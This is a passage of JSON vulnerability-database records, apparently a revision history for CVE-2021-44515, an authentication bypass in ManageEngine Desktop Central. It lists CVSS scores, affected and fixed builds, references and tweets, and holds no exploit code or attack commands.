"https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T06:55:46", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 56}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T06:56:39", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T06:56:39"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T06:56:39", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 57}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T07:25:47", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T07:25:47"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T07:25:47", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 58}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T07:55:37", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T07:25:47"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T07:55:37", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 59}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T07:55:47", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T07:55:47"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T07:55:47", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 60}], "viewCount": 44, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "threatpost", "idList": ["THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "thn", "idList": ["THN:A29E47C7A7467A109B420FF0819814EE", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}], "modified": "2021-12-17T08:25:39", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T08:25:39"}, "score": {"value": 2.9, "vector": "NONE", "modified": "2021-12-17T08:25:39", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, 